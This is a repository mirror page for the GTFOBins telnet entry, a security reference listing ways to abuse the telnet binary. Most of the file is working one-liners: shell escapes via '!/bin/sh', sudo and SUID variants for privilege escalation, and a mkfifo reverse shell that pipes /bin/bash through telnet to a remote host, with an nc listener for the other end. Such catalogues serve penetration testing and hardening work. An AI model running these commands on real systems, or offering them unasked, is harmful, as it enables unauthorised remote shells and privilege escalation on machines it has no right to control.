This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-04 18:58:33 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
f2be339850beb7b80ea8f08883bd69a2940f438c
GTFOBins.github.io
/
_gtfobins
/
telnet.md
Emilio Pinna
ac29dc064d
Fix telnet descriptions
2018-05-22 21:26:17 +01:00
801 B
Raw
Blame
History
functions
functions
exec-interactive
reverse-shell
sudo-enabled
suid-limited
description
code
BSD version only.
RHOST=www.google.com RPORT=80 telnet $RHOST $RPORT ^] !/bin/sh
description
code
Run `nc -l -p 8000` to receive the shell on the other end.
RHOST=10.0.0.1 RPORT=8000 TF=$(mktemp) rm $TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
description
code
BSD version only.
RHOST=www.google.com RPORT=80 sudo telnet $RHOST $RPORT ^] !/bin/sh
description
code
BSD version only.
RHOST=www.google.com RPORT=80 ./telnet $RHOST $RPORT ^] !/bin/sh
Reference in New Issue
View Git Blame
Copy Permalink